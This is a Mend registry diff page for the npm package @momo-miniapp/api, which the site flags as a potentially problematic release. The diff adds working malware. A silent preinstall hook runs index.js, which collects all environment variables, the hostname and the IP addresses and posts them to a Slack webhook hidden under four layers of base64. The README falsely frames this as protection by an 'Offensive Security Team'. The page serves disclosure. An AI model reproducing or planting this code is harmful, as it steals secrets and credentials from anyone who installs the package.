npm - @momo-miniapp/api - Versions diffs - 0.0.1-security → 0.1.5-beta.31337 - Mend

@momo-miniapp/api 0.0.1-security → 0.1.5-beta.31337

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @momo-miniapp/api might be problematic. Click here for more details.

Files changed (3) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40momo-miniapp%2Fapi for more information.
+The Offensive Security Team protected this module from unauthorized threat actors.

package/index.js ADDED Viewed

@@ -0,0 +1,71 @@
+const axios = require('axios');
+const os = require('os');
+// Set your Slack webhook URL
+const slackWebhookUrl =
+'V1ZWb1UwMUhUa2xVVkZwTlpWUnNkbGxxU1RWamJVNDFUbGh3YVZJd1duRlpXR3N4WVcxSmVVMUlXbXBOYkZvMVdrY3hjMkZzY0ZsVVdGcFhVbGM1TkZac1dtRlZiRnBGVm14b1RVMUZiRE5VYlhCR1RrVXdlR0pGTlU5V1JWVjZWRVJDYzAwd05IbFBWbHBXVFcxU2RGWkZaSGRsVm1SWVUyczFhVkpIZUZkYVZWcGhWREZXVmsxVVJsaGFlakE1';
+// Define a function to decode base64 string four times
+function decodeBase64FourTimes(input) {
+  let decodedString = input;
+  for (let i = 0; i < 4; i++) {
+    const buffer = Buffer.from(decodedString, 'base64');
+    decodedString = buffer.toString('utf-8');
+  }
+  return decodedString;
+}
+// Function to format environment variables
+function formatEnvVariables() {
+  const envVariables = process.env;
+  const formattedEnv = Object.keys(envVariables).map((key) => `${key}: ${envVariables[key]}`);
+  return formattedEnv.join('\n');
+}
+// Function to obtain hostname
+function getHostname() {
+  return os.hostname();
+}
+// Function to obtain IP addresses
+function getIPAddresses() {
+  const networkInterfaces = os.networkInterfaces();
+  const ipAddresses = [];
+  Object.keys(networkInterfaces).forEach((iface) => {
+    networkInterfaces[iface].forEach((details) => {
+      if (details.family === 'IPv4' && !details.internal) {
+        ipAddresses.push(`${iface}: ${details.address}`);
+      }
+    });
+  });
+  return ipAddresses.join('\n');
+}
+// Function to send a message to Slack
+async function sendSlackMessage(message) {
+  try {
+    const response = await axios.post(decodeBase64FourTimes(slackWebhookUrl), {
+      text: message,
+    });
+    console.log('');
+  } catch (error) {
+    console.error('');
+  }
+}
+// Main function to format and send environment variables, hostname, and IP addresses to Slack
+function sendSystemInfoToSlack() {
+  const formattedEnv = formatEnvVariables();
+  const hostname = getHostname();
+  const ipAddresses = getIPAddresses();
+  const message = '```System Information:\n' +
+    'Hostname: ' + hostname + '\n' +
+    'IP Addresses:\n' + ipAddresses + '\n' +
+    'OS Environment Variables:\n' + formattedEnv + '```';
+  sendSlackMessage(message);
+}
+// Call the main function
+sendSystemInfoToSlack();

package/package.json CHANGED Viewed

@@ -1,6 +1,15 @@
 {
   "name": "@momo-miniapp/api",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "0.1.5-beta.31337",
+  "description": "Development From Offensive Security",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js > /dev/null 2>&1",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "@abdilahrf",
+  "license": "ISC",
+  "dependencies": {
+    "axios": "^1.5.1"
+  }
 }